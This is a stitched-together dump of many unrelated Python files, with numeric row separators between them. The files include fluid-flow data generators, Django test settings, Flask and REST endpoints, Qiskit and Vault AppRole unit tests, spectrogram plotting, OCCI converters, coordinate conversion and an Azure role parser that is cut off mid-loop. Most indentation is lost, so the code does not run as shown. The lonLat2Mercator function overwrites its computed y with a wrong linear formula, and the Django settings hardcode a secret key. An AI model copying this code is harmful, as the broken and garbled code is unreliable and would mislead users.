nodes_X, nodes_Y = np.array([]), np.array([])
Us, Vs, ps = np.array([]), np.array([]), np.array([])
Nt = 101
times = np.linspace(0, 1, Nt)
for t in times:
nodes_X = np.vstack([nodes_X, single_nodes_X]) if nodes_X.size else single_nodes_X
nodes_Y = np.vstack([nodes_Y, single_nodes_Y]) if nodes_Y.size else single_nodes_Y
Us = np.vstack([Us, U]) if Us.size else U
Vs = np.vstack([Vs, V]) if Vs.size else V
ps = np.vstack([ps, p]) if ps.size else p
Re, Ur = 1e-3*1*d/mu, np.inf # Reynolds number and reduced velocity are not
# defined in the Hagen-Poiseuille problem
flow = Flow()
flow.Re, flow.Ur = Re, Ur
flow.times = times
flow.nodes_X, flow.nodes_Y = nodes_X, nodes_Y
flow.Us, flow.Vs, flow.ps = Us, Vs, ps
write_flow(flow, parent_folder + 'flows/poiseuille')
find_neighbors(elements)
write_elements(elements, parent_folder + 'elements/poiseuille')
write_geometries(np.array([]), parent_folder + 'geometries/poiseuille')
def generate_periodic(path_msh, parent_folder):
single_nodes_X, single_nodes_Y, elements = extract_msh(path_msh)
d = np.max(single_nodes_Y) - np.min(single_nodes_Y)
Nt = 101
times = np.linspace(0, 1, Nt)
period = 0.25
w = 2*np.pi/period
# U = U0*cos(wt) with U0 = 1
# Navier-Stokes, uniform:
# rho dU/dt + 0 = - dp/dx with rho = 1
# dp/dx = rhoU0*w*sin(wt)
# p = p0 + rhoU0*w*sin(wt) with p0 = 0
nodes_X, nodes_Y = np.array([]), np.array([])
Us, Vs, ps = np.array([]), np.array([]), np.array([])
for t in times:
nodes_X = np.vstack([nodes_X, single_nodes_X]) if nodes_X.size else single_nodes_X
nodes_Y = np.vstack([nodes_Y, single_nodes_Y]) if nodes_Y.size else single_nodes_Y
U = 0*nodes_X + np.cos(w*t)
V = 0*nodes_X
p = 0*nodes_X + w*np.sin(w*t)
Us = np.vstack([Us, U]) if Us.size else U
Vs = np.vstack([Vs, V]) if Vs.size else V
ps = np.vstack([ps, p]) if ps.size else p
Re, Ur = 1*1*d/1e-6, np.inf
flow = Flow()
flow.Re, flow.Ur = Re, Ur
flow.times = times
flow.nodes_X, flow.nodes_Y = nodes_X, nodes_Y
flow.Us, flow.Vs, flow.ps = Us, Vs, ps
write_flow(flow, parent_folder + 'flows/periodic')
find_neighbors(elements)
write_elements(elements, parent_folder + 'elements/periodic')
write_geometries(np.array([]), parent_folder + 'geometries/periodic')
def generate_inviscid(path_msh, parent_folder):
single_nodes_X, single_nodes_Y, elements = extract_msh(path_msh)
rs = np.sqrt(single_nodes_X**2 + single_nodes_Y**2)
thetas = np.arctan2(single_nodes_Y, single_nodes_X)
Ur, Utheta, p = [], [], []
for r, theta in zip(rs, thetas):
if r == 0:
Ur.append(0)
Utheta.append(0)
p.append(0)
else:
Ur.append((1 - (0.5/r)**2)*np.cos(theta))
Utheta.append((1 + (0.5/r)**2)*np.sin(theta))
p.append(2*(0.5/r)**2 * np.cos(2*theta) - (0.5/r)**4)
Ur = np.array(Ur)
Utheta = np.array(Utheta)
p = np.array(p)
U = Ur*np.cos(thetas) - Utheta*np.sin(thetas)
V = Ur*np.sin(thetas) - Utheta*np.cos(thetas)
nodes_X, nodes_Y = np.array([]), np.array([])
Us, Vs, ps = np.array([]), np.array([]), np.array([])
Nt = 101
times = np.linspace(0, 1, Nt)
for t in times:
nodes_X = np.vstack([nodes_X, single_nodes_X]) if nodes_X.size else single_nodes_X
nodes_Y = np.vstack([nodes_Y, single_nodes_Y]) if nodes_Y.size else single_nodes_Y
Us = np.vstack([Us, U]) if Us.size else U
Vs = np.vstack([Vs, V]) if Vs.size else V
ps = np.vstack([ps, p]) if ps.size else p
Re, Ur = 1e+6, 0.
flow = Flow()
flow.Re, flow.Ur = Re, Ur
flow.times = times
flow.nodes_X, flow.nodes_Y = nodes_X, nodes_Y
flow.Us, flow.Vs, flow.ps = Us, Vs, ps
write_flow(flow, parent_folder + 'flows/potential')
find_neighbors(elements)
write_elements(elements, parent_folder + 'elements/potential')
write_geometries(np.array([[5,407,404,408,405,409,406,410,6,414,411,415,412,416,413,417]]),
parent_folder + 'geometries/potential')
| 7,190 | 2,829 |
# Copyright: (c) 2020, Syntropy Network
# MIT License
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import os
import traceback
SDK_IMP_ERR = None
try:
from syntropy_sdk import ApiClient, ApiKeysApi, AuthApi, Configuration, PlatformApi
from syntropy_sdk.exceptions import ApiException, SyntropyError
from syntropy_sdk.models import AccessTokenData
from syntropy_sdk.utils import (
MAX_QUERY_FIELD_SIZE,
BatchedRequest,
login_with_access_token,
)
from syntropynac.configure import configure_network
from syntropynac.exceptions import ConfigureNetworkError
from syntropynac.fields import ConfigFields
HAS_SDK = True
except ImportError:
HAS_SDK = False
SDK_IMP_ERR = traceback.format_exc()
class EnvVars:
API_URL = "SYNTROPY_API_SERVER"
TOKEN = "SYNTROPY_API_TOKEN"
def get_api_client(api_url=None, api_key=None):
config = Configuration()
config.host = api_url if api_url else os.environ.get(EnvVars.API_URL)
access_token = api_key if api_key else os.environ.get(EnvVars.TOKEN)
config.api_key["Authorization"] = login_with_access_token(config.host, access_token)
return ApiClient(config)
def api_getter_builder(T):
def get(api_url=None, api_key=None, client=None):
return T(get_api_client(api_url, api_key)) if client is None else T(client)
return get
if HAS_SDK:
get_auth_api = api_getter_builder(AuthApi)
get_api_keys_api = api_getter_builder(ApiKeysApi)
get_platform_api = api_getter_builder(PlatformApi)
| 1,581 | 547 |
# Django settings for testproject project.
import os
DIRNAME = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = True
ADMINS = ()
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(DIRNAME, 'db.sqlite3'),
'TEST_NAME': os.path.join(DIRNAME, 'test_db.sqlite3'),
}
}
TIME_ZONE = 'Europe/Rome'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
MEDIA_ROOT = ''
MEDIA_URL = ''
SECRET_KEY = 'vaO4Y<g#YRWG8;Md8noiLp>.w(w~q_b=|1`?9<x>0KxA%UB!63'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'custard.tests.urls'
TEMPLATE_DIRS = ()
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'custard',
'custard.tests',
)
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
STATIC_URL = '/static/'
| 1,394 | 558 |
p = float(input('Digite o preço do produto'))
d = p - (p* 5/100)
print ('o preço do produto é {:.2f} e com 5% de desconto fica {:.2f}'.format(p,d)) | 149 | 71 |
from flask import (Blueprint, request)
from . import temp
temp_controller = Blueprint('temp-controller', __name__, url_prefix='/api/temp')
@temp_controller.route('/', methods=["GET"])
def api_temp_control():
return temp.read_temp() | 238 | 74 |
from inspect import stack
import logging
from time import mktime
import pytz
from datetime import *
from calendar import timegm
# from django.http import HttpResponse, HttpResponseRedirect, HttpResponseRedirectBase
from django.conf import settings
from django.utils import timezone
from social.apps.django_app.default.models import UserSocialAuth
import twitter
from twitter import *
EPOCH = 1970
_EPOCH_ORD = date(EPOCH, 1, 1).toordinal()
class Tz:
# assumes a date, unless you pass date_format, and then assumes it needs to be parsed
@staticmethod
def convert_to_utc(naive, date_format=None, user_tz=None):
if date_format:
naive = datetime.strptime (naive, date_format)
# if not specified, default to user context
if not user_tz:
user_tz = timezone.get_current_timezone()
local_dt = user_tz.localize(naive, is_dst=None)
utc_dt = local_dt.astimezone(pytz.utc)
return utc_dt
@staticmethod
def convert_to_local(dt, user_tz=None):
# if not specified, default to user context
if not user_tz:
user_tz = timezone.get_current_timezone()
local_dt = dt.astimezone(user_tz)
return local_dt
class Logger():
@staticmethod
def info(str):
LOGGER.info(str)
@staticmethod
def exception(str):
LOGGER.exception(str)
class Twitter:
@staticmethod
def get_twitter(user):
from django.conf import settings
consumer_key = settings.SOCIAL_AUTH_TWITTER_KEY
consumer_secret = settings.SOCIAL_AUTH_TWITTER_SECRET
access_token_key = settings.TWITTER_ACCESS_TOKEN
access_token_secret = settings.TWITTER_ACCESS_TOKEN_SECRET
usa = UserSocialAuth.objects.get(user=user, provider='twitter')
if usa:
access_token = usa.extra_data['access_token']
if access_token:
access_token_key = access_token['oauth_token']
access_token_secret = access_token['oauth_token_secret']
if not access_token_key or not access_token_secret:
raise Exception('No user for twitter API call')
api = twitter.Api(
base_url='https://api.twitter.com/1.1',
consumer_key=consumer_key,
consumer_secret=consumer_secret,
access_token_key=access_token_key,
access_token_secret=access_token_secret)
return api
@staticmethod
def get_access_tokens(user):
usa = UserSocialAuth.objects.get(user=user, provider='twitter')
access_token = usa.extra_data['access_token']
return access_token
| 2,753 | 834 |
ShaderNodeGroup.interface = None
| 35 | 12 |
"""
Python RPC Client for Discord
-----------------------------
By: qwertyquerty and LewdNeko
"""
from .baseclient import BaseClient
from .client import Client
from .presence import Presence
from .exceptions import *
__title__ = 'pypresence'
__author__ = 'qwertyquerty'
__copyright__ = 'Copyright 2018 qwertyquerty'
__license__ = 'MIT'
__version__ = '1.0.9'
| 360 | 129 |
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Tests preset pass manager functionalities"""
from qiskit.test import QiskitTestCase
from qiskit.compiler import transpile
from qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister
from qiskit.test.mock import FakeTenerife, FakeMelbourne, FakeRueschlikon, FakeTokyo
class TestPresetPassManager(QiskitTestCase):
"""Test preset passmanagers work as expected."""
def test_no_coupling_map(self):
"""Test that coupling_map can be None"""
q = QuantumRegister(2, name='q')
test = QuantumCircuit(q)
test.cz(q[0], q[1])
for level in [0, 1, 2, 3]:
with self.subTest(level=level):
test2 = transpile(test, basis_gates=['u1', 'u2', 'u3', 'cx'],
optimization_level=level)
self.assertIsInstance(test2, QuantumCircuit)
class TestFakeBackendTranspiling(QiskitTestCase):
"""Test transpiling on mock backends work properly"""
def setUp(self):
q = QuantumRegister(2)
c = ClassicalRegister(2)
self._circuit = QuantumCircuit(q, c)
self._circuit.h(q[0])
self._circuit.cx(q[0], q[1])
self._circuit.measure(q, c)
def test_optimization_level(self):
"""Test several backends with all optimization levels"""
for backend in [FakeTenerife(), FakeMelbourne(), FakeRueschlikon(), FakeTokyo()]:
for optimization_level in range(4):
result = transpile(
[self._circuit],
backend=backend,
optimization_level=optimization_level
)
self.assertIsInstance(result, QuantumCircuit)
| 2,193 | 682 |
#!/usr/bin/env python
# coding=utf-8
# wujian@2020
import argparse
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
from libs.data_handler import SpectrogramReader
from libs.opts import StftParser
from libs.utils import get_logger
default_font = "Times New Roman"
default_font_size = 10
default_dpi = 200
default_fmt = "jpg"
logger = get_logger(__name__)
def save_figure(key, mat, dest, cmap="jet", hop=256, sr=16000, title=""):
"""
Save figure to disk
"""
def sub_plot(ax, mat, num_frames, num_bins, xticks=True, title=""):
ax.imshow(np.transpose(mat),
origin="lower",
cmap=cmap,
aspect="auto",
interpolation="none")
if xticks:
xp = np.linspace(0, num_frames - 1, 5)
ax.set_xticks(xp)
ax.set_xticklabels([f"{t:.2f}" for t in (xp * hop / sr)],
fontproperties=default_font)
ax.set_xlabel("Time (s)", fontdict={"family": default_font})
else:
ax.set_xticks([])
yp = np.linspace(0, num_bins - 1, 6)
fs = np.linspace(0, sr / 2, 6) / 1000
ax.set_yticks(yp)
ax.set_yticklabels([f"{t:.1f}" for t in fs],
fontproperties=default_font)
ax.set_ylabel("Frequency (kHz)", fontdict={"family": default_font})
if title:
ax.set_title(title, fontdict={"family": default_font})
logger.info(f"Plot TF-mask of utterance {key} to {dest}.{default_fmt}...")
if mat.ndim == 3:
N, T, F = mat.shape
else:
T, F = mat.shape
N = 1
fig, ax = plt.subplots(nrows=N)
if N != 1:
ts = title.split(";")
for i in range(N):
if len(ts) == N:
sub_plot(ax[i], mat[i], T, F, xticks=i == N - 1, title=ts[i])
else:
sub_plot(ax[i], mat[i], T, F, xticks=i == N - 1)
else:
sub_plot(ax, mat, T, F, title=title)
fig.savefig(f"{dest}.{default_fmt}", dpi=default_dpi, format=default_fmt)
plt.close(fig)
def run(args):
cache_dir = Path(args.cache_dir)
cache_dir.mkdir(parents=True, exist_ok=True)
stft_kwargs = {
"frame_len": args.frame_len,
"frame_hop": args.frame_hop,
"round_power_of_two": args.round_power_of_two,
"window": args.window,
"center":
args.center # false to comparable with kaldi
}
reader = SpectrogramReader(args.wav_scp,
**stft_kwargs,
apply_abs=True,
apply_log=True,
transpose=True)
for key, mat in reader:
if mat.ndim == 3 and args.index >= 0:
mat = mat[args.index]
save_figure(key,
mat,
cache_dir / key.replace(".", "-"),
cmap=args.cmap,
hop=args.frame_hop,
sr=args.sr,
title=args.title)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Command to visualize audio spectrogram.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=[StftParser.parser])
parser.add_argument("wav_scp", type=str, help="Read specifier of audio")
parser.add_argument("--sr",
type=int,
default=16000,
help="Sample frequency (Hz)")
parser.add_argument("--cache-dir",
type=str,
default="spectrogram",
help="Directory to dump spectrograms")
parser.add_argument("--cmap",
choices=["binary", "jet", "hot"],
default="jet",
help="Colormap used when save figures")
parser.add_argument("--index",
type=int,
default=-1,
help="Channel index to plot, -1 means all")
parser.add_argument("--title",
type=str,
default="",
help="Title of the pictures")
args = parser.parse_args()
run(args)
| 4,291 | 1,364 |
# Copyright 2010-2012 Institut Mines-Telecom
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Jun 21, 2012
@author: Bilel Msekni
@contact: bilel.msekni@telecom-sudparis.eu
@author: Houssem Medhioub
@contact: houssem.medhioub@it-sudparis.eu
@organization: Institut Mines-Telecom - Telecom SudParis
@license: Apache License, Version 2.0
"""
try:
import simplejson as json
except ImportError:
import json
import pyocni.adapters.cnv_toHTTP as extractor
from webob import Response
class To_HTTP_Text_Plain():
"""
Converts Response data from application/occi+json object to HTTP text/plain descriptions
"""
def format_to_text_plain_categories(self, var):
"""
Format JSON categories into HTTP text/plain categories
Args:
@param var: JSON categories
"""
resp = ""
if var.has_key('kinds'):
items = var['kinds']
for item in items:
resp += "Category :" + cnv_JSON_category(item, "kind") + "\n"
if var.has_key('mixins'):
items = var['mixins']
for item in items:
resp += "Category :" + cnv_JSON_category(item, "mixin") + "\n"
if var.has_key('actions'):
items = var['actions']
for item in items:
resp += "Category :" + cnv_JSON_category(item, "action") + "\n"
return resp
def format_to_text_plain_entities(self, var):
"""
Convert a JSON resource description into a text/plain resource description
Args:
@param var: JSON resource description
"""
response = ""
if var.has_key('resources'):
items = var['resources']
for item in items:
cat, link, att = cnv_JSON_Resource(item)
for c in cat:
response += "Category: " + c + "\n"
for l in link:
response += "Link: " + l + "\n"
for a in att:
response += "X-OCCI-Attribute: " + a + "\n"
response = response[:-1] + ",\n"
response = response[:-2]
if var.has_key('links'):
items = var['links']
response += ",\n"
for item in items:
cat, link, att = cnv_JSON_Resource(item)
for c in cat:
response += "Category: " + c + "\n"
for l in link:
response += "Link: " + l + "\n"
for a in att:
response += "X-OCCI-Attribute: " + a + "\n"
response = response[:-1] + ",\n"
response = response[:-2]
return response
def format_to_text_plain_locations(self, var):
"""
Converts JSON locations into HTTP locations
Args:
var: JSON locations
"""
locs = ""
for item in var:
locs += "Location: " + item + "\n"
return locs
def format_to_text_plain_x_locations(self, var):
"""
Converts JSON locations into HTTP locations
Args:
var: JSON locations
"""
locs = ""
for item in var:
locs += "X-OCCI-Location: " + item + "\n"
return locs
class To_HTTP_Text_OCCI():
"""
Converts Response data from application/occi+json object to HTTP text/occi descriptions
"""
def format_to_text_occi_categories(self, var):
"""
Format JSON categories into HTTP text/plain categories
Args:
@param var: JSON categories
"""
resp = Response()
resp.headers.clear()
value = ""
if var.has_key('kinds'):
items = var['kinds']
for item in items:
value = cnv_JSON_category(item, "kind") + ",\n"
resp.headers.add('Category', value[:-2])
if var.has_key('mixins'):
items = var['mixins']
for item in items:
value = cnv_JSON_category(item, "mixin") + ",\n"
resp.headers.add('Category', value[:-2])
if var.has_key('actions'):
items = var['actions']
for item in items:
value = cnv_JSON_category(item, "action") + ",\n"
resp.headers.add('Category', value[:-2])
return resp.headers
def format_to_text_occi_entities(self, var):
"""
Convert a JSON resource description into a text/occi resource description
Args:
@param var: JSON resource description
"""
response = Response()
response.headers.clear()
if var.has_key('resources'):
items = var['resources']
for item in items:
cat, link, att = cnv_JSON_Resource(item)
for c in cat:
response.headers.add("Category", c)
for l in link:
response.headers.add("Link", l)
for a in att:
response.headers.add("X-OCCI-Attribute", a)
if var.has_key('links'):
items = var['links']
for item in items:
cat, link, att = cnv_JSON_Resource(item)
for c in cat:
response.headers.add("Category", c)
for l in link:
response.headers.add("Link", l)
for a in att:
response.headers.add("X-OCCI-Attribute", a)
return response.headers
def format_to_text_occi_locations(self, var):
"""
Converts JSON locations into HTTP locations
Args:
var: JSON locations
"""
locs = ""
resp = Response()
resp.headers.clear()
for item in var:
locs += item + ","
resp.headers.add("Location", locs[:-1])
return resp.headers
def format_to_text_x_occi_locations(self, var):
"""
Converts JSON locations into HTTP locations
Args:
var: JSON locations
"""
locs = ""
resp = Response()
resp.headers.clear()
for item in var:
locs += item + ","
resp.headers.add("X-OCCI-Location", locs[:-1])
return resp.headers
class To_HTTP_Text_URI_List():
"""
Converts Response data from application/occi+json object to HTTP text/uri descriptions
"""
def __init__(self):
pass
def check_for_uri_locations(self, var):
"""
Checks for the existence of path URIs in a JSON location object
Args:
@param var: JSON location object
"""
resp = ""
for item in var:
resp += item + "\n"
return resp, True
def cnv_JSON_category(category, type):
"""
Converts a json category into a HTTP category
Args:
@param category: JSON category
@param type: Category type = (kind || mixin || action)
"""
http_cat = extractor.extract_term_from_category(category) + ';'
http_cat += "scheme=\"" + extractor.extract_scheme_from_category(category) + "\";"
http_cat += "class=\"" + type + "\";"
title = extractor.extract_title_from_category(category)
if title is not None:
http_cat += "title=\"" + title + "\";"
rel = extractor.extract_related_from_category(category)
if rel is not None:
http_cat += "rel=\"" + rel + "\";"
attributes = extractor.extract_attributes_from_category(category)
if attributes is not None:
http_cat += "attributes=\"" + attributes + "\";"
actions = extractor.extract_actions_from_category(category)
if actions is not None:
http_cat += "actions=\"" + actions + "\";"
location = extractor.extract_location_from_category(category)
if location is not None:
http_cat += "location=\"" + location + "\";"
return http_cat
def cnv_JSON_Resource(json_object):
"""
Converts a JSON Resource into a HTTP Resource
"""
res_cat = list()
res_links = list()
res_cat.append(extractor.extract_kind_from_entity(json_object))
items = extractor.extract_mixin_from_entity(json_object)
if items is not None:
res_cat.extend(items)
var = extractor.extract_attributes_from_entity(json_object)
if var is not None:
res_att = var
else:
res_att = list()
items = extractor.extract_internal_link_from_entity(json_object)
if items is not None:
res_links.extend(items)
items = extractor.extract_actions_from_entity(json_object)
if items is not None:
res_links.extend(items)
return res_cat, res_links, res_att
| 9,246 | 2,705 |
from typing import Any, Optional
from restapi import decorators
from restapi.endpoints.schemas import NewPassword, profile_output, profile_patch_input
from restapi.exceptions import Unauthorized
from restapi.rest.definition import EndpointResource, Response
from restapi.services.authentication import AuthMissingTOTP, User
from restapi.utilities.globals import mem
from restapi.utilities.logs import log
class Profile(EndpointResource):
depends_on = ["MAIN_LOGIN_ENABLE", "AUTH_ENABLE"]
labels = ["profile"]
@decorators.auth.require()
@decorators.marshal_with(profile_output(), code=200)
@decorators.endpoint(
path="/auth/profile",
summary="List profile attributes",
responses={200: "User profile is returned"},
)
def get(self, user: User) -> Response:
data = {
"uuid": user.uuid,
"email": user.email,
"name": user.name,
"surname": user.surname,
"isAdmin": self.auth.is_admin(user),
"isStaff": self.auth.is_staff(user),
"isCoordinator": self.auth.is_coordinator(user),
"privacy_accepted": user.privacy_accepted,
"last_password_change": user.last_password_change,
"first_login": user.first_login,
"last_login": user.last_login,
"is_active": user.is_active,
"expiration": user.expiration,
"belongs_to": user.belongs_to,
# Convert list of Roles into a dict with name: description
"roles": {role.name: role.description for role in user.roles},
"two_factor_enabled": self.auth.SECOND_FACTOR_AUTHENTICATION,
}
data = mem.customizer.manipulate_profile(ref=self, user=user, data=data)
return self.response(data)
@decorators.auth.require()
@decorators.use_kwargs(NewPassword)
@decorators.endpoint(
path="/auth/profile",
summary="Update user password",
responses={204: "Password updated"},
)
def put(
self,
password: str,
new_password: str,
password_confirm: str,
user: User,
totp_code: Optional[str] = None,
) -> Response:
try:
self.auth.make_login(user.email, password, totp_code)
except AuthMissingTOTP:
raise Unauthorized("Verification code is missing")
self.auth.change_password(user, password, new_password, password_confirm)
self.auth.save_user(user)
return self.empty_response()
@decorators.auth.require()
@decorators.use_kwargs(profile_patch_input())
@decorators.endpoint(
path="/auth/profile",
summary="Update profile information",
responses={204: "Profile updated"},
)
def patch(self, user: User, **kwargs: Any) -> Response:
"""Update profile for current user"""
# mypy correctly raises errors because update_properties is not defined
# in generic Connector instances, but in this case this is an instance
# of an auth db and their implementation always contains this method
self.auth.db.update_properties(user, kwargs) # type: ignore
log.info("Profile updated")
self.auth.save_user(user)
self.log_event(self.events.modify, user, kwargs)
return self.empty_response()
| 3,352 | 964 |
comp1 = [x1 := x * x for x in range(10)]
print(comp1)
print(x1)
print(globals().get('x'))
def f2():
comp2 = [x2 := x ** 3 for x in range(9)]
print(comp2)
print(x2)
print(locals().get('x'))
def f3():
global x3
comp3 = [x3 := x ** 4 for x in range(8)]
print(comp3)
print(locals().get('x'))
def f4():
x4 = 0
def g4():
nonlocal x4
comp4 = [x4 := x ** 5 for x in range(7)]
print(comp4)
print(locals().get('x'))
g4()
print(x4)
def f5():
comp5 = [[x5 := i for i in range(3)] for j in range(2)]
print(comp5)
print(x5)
print(locals().get('i'))
print(locals().get('j'))
f2()
print(globals().get('x'))
print(globals().get('x2'))
f3()
print(globals().get('x'))
print(globals().get('x3'))
f4()
print(globals().get('x'))
print(globals().get('x4'))
f5()
print(globals().get('i'))
print(globals().get('j'))
print(globals().get('x5'))
| 928 | 399 |
# -*- coding: utf-8 -*-
# Copyright (c) 2021 Brian Scholer (@briantist)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
from ansible_collections.community.hashi_vault.tests.unit.compat import mock
from ansible_collections.community.hashi_vault.plugins.module_utils._auth_method_approle import (
HashiVaultAuthMethodApprole,
)
from ansible_collections.community.hashi_vault.plugins.module_utils._hashi_vault_common import (
HashiVaultAuthMethodBase,
HashiVaultValueError,
)
@pytest.fixture
def option_dict():
return {
'auth_method': 'approle',
'secret_id': None,
'role_id': None,
'mount_point': None,
}
@pytest.fixture
def secret_id():
return 'opaque'
@pytest.fixture
def role_id():
return 'fake-role'
@pytest.fixture
def auth_approle(adapter, warner):
return HashiVaultAuthMethodApprole(adapter, warner)
@pytest.fixture
def approle_login_response(fixture_loader):
return fixture_loader('approle_login_response.json')
class TestAuthApprole(object):
def test_auth_approle_is_auth_method_base(self, auth_approle):
assert isinstance(auth_approle, HashiVaultAuthMethodApprole)
assert issubclass(HashiVaultAuthMethodApprole, HashiVaultAuthMethodBase)
def test_auth_approle_validate_direct(self, auth_approle, adapter, role_id):
adapter.set_option('role_id', role_id)
auth_approle.validate()
@pytest.mark.parametrize('opt_patch', [
{},
{'secret_id': 'secret_id-only'},
])
def test_auth_approle_validate_xfailures(self, auth_approle, adapter, opt_patch):
adapter.set_options(**opt_patch)
with pytest.raises(HashiVaultValueError, match=r'Authentication method approle requires options .*? to be set, but these are missing:'):
auth_approle.validate()
@pytest.mark.parametrize('use_token', [True, False], ids=lambda x: 'use_token=%s' % x)
@pytest.mark.parametrize('mount_point', [None, 'other'], ids=lambda x: 'mount_point=%s' % x)
def test_auth_approle_authenticate(self, auth_approle, client, adapter, secret_id, role_id, mount_point, use_token, approle_login_response):
adapter.set_option('secret_id', secret_id)
adapter.set_option('role_id', role_id)
adapter.set_option('mount_point', mount_point)
expected_login_params = {
'secret_id': secret_id,
'role_id': role_id,
'use_token': use_token,
}
if mount_point:
expected_login_params['mount_point'] = mount_point
def _set_client_token(*args, **kwargs):
if kwargs['use_token']:
client.token = approle_login_response['auth']['client_token']
return approle_login_response
with mock.patch.object(client.auth.approle, 'login', side_effect=_set_client_token) as approle_login:
response = auth_approle.authenticate(client, use_token=use_token)
approle_login.assert_called_once_with(**expected_login_params)
assert response['auth']['client_token'] == approle_login_response['auth']['client_token']
assert (client.token == approle_login_response['auth']['client_token']) is use_token
| 3,358 | 1,100 |
from distutils.core import setup, Extension
import glob
import os
# the c++ extension module
sources = glob.glob("*.c")
os.environ["CC"] = "gcc"
os.environ["CXX"] = "g++"
extension_mod = Extension("libamy", sources=sources, extra_link_args=["-lsoundio", "-lpthread"])
setup(name = "libamy",
ext_modules=[extension_mod]) | 323 | 113 |
# -*- coding: utf-8 -*-
from sqlalchemy import Column
from sqlalchemy.dialects.mysql import INTEGER
from common.db import BaseModel
class JobKeywordModel(BaseModel):
__tablename__ = 'job_keyword'
id = Column(INTEGER, primary_key=True, autoincrement=True)
job_id = Column(INTEGER, doc=u'工作 id')
keyword_id = Column(INTEGER, doc=u'关键词 id')
city_id = Column(INTEGER, doc=u'冗余:所在城市 id')
@classmethod
def list(cls, job_id=None):
query = cls.session.query(cls)
if job_id:
query = query.filter(cls.job_id == job_id)
return query.all()
@classmethod
def add(cls, job_id, keyword_id, city_id):
job_keyword = cls(job_id=int(job_id), keyword_id=int(keyword_id), city_id=int(city_id))
cls.session.merge(job_keyword)
cls.session.commit()
| 826 | 318 |
#!/usr/bin/env python
# coding=utf-8
"""
Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved
File: ll_2_mc.py
func: 墨卡托与经纬度间相互转换
Author: yuwei09(yuwei09@baidu.com)
Date: 2021/07/21
"""
import math
SCALE_S = 20037508.34
def lonLat2Mercator(x, y):
"""Convert longitude/latitude to Mercator coordinate"""
mx = x * SCALE_S / 180.
my = math.log(math.tan((90. + y) * math.pi / 360.)) / (math.pi / 180.)
my = y * SCALE_S / 180.
return mx, my
def Mercator2LonLat(x, y):
"""Convert Mercotor point to longitude/latitude cooridinat"""
lx = x / SCALE_S * 180.
ly = y / SCALE_S * 180.
ly = 180 / math.pi * (2 * math.atan(math.exp(ly * math.pi / 180.)) - math.pi / 2)
return lx, ly
if __name__ == '__main__':
x, y = 12962922.3800, 4832335.0200
lx, ly = Mercator2LonLat(x, y)
print(lx, ly)
# lx, ly = bd09mc_to_bd09ll(x, y)
# print(lx, ly)
| 905 | 487 |
import os
import json
import time
import requests
import re
result = {
'roles': []
}
raw_roles = []
with open("azure/built-in-roles-raw.json", "r") as f:
raw_roles = json.loads(f.read())
provider_ops = []
with open("azure/provider-operations.json", "r") as f:
provider_ops = json.loads(f.read())
for raw_role in raw_roles:
if raw_role['roleType'] != "BuiltInRole":
continue
permitted_actions = []
permitted_data_actions = []
has_unknown = False
has_external = False
for permission in raw_role['permissions']:
for action in permission['actions']:
matched = False
matchexpression = "^" + action.replace(".", "\\.").replace("*", ".*").replace("?", ".{{1}}") + "$"
for provider in provider_ops:
for operation in provider['operations']:
if not operation['isDataAction'] and re.search(matchexpression.lower(), operation['name'].lower()):
permitted_actions.append({
'name': operation['name'],
'description': operation['description'],
'displayName': operation['displayName'],
'providerName': provider['name'],
'providerDisplayName': provider['displayName']
})
matched = True
for resource_type in provider['resourceTypes']:
for operation in resource_type['operations']:
if not operation['isDataAction'] and re.search(matchexpression.lower(), operation['name'].lower()):
permitted_actions.append({
'name': operation['name'],
'description': operation['description'],
'displayName': operation['displayName'],
'providerName': provider['name'],
'providerDisplayName': provider['displayName']
})
matched = True
if not action.lower().startswith("microsoft."):
has_external = True
if not matched:
has_unknown = True
for permission in raw_role['permissions']:
for action in permission['dataActions']:
matched = False
matchexpression = "^" + action.replace(".", "\\.").replace("*", ".*").replace("?", ".{{1}}") + "$"
for provider in provider_ops:
for operation in provider['operations']:
if operation['isDataAction'] and re.search(matchexpression.lower(), operation['name'].lower()):
permitted_data_actions.append({
'name': operation['name'],
'description': operation['description'],
'displayName': operation['displayName'],
'providerName': provider['name'],
'providerDisplayName': provider['displayName']
})
matched = True
for resource_type in provider['resourceTypes']:
for operation in resource_type['operations']:
if operation['isDataAction'] and re.search(matchexpression.lower(), operation['name'].lower()):
permitted_data_actions.append({
'name': operation['name'],
'description': operation['description'],
'displayName': operation['displayName'],
'providerName': provider['name'],
'providerDisplayName': provider['displayName']
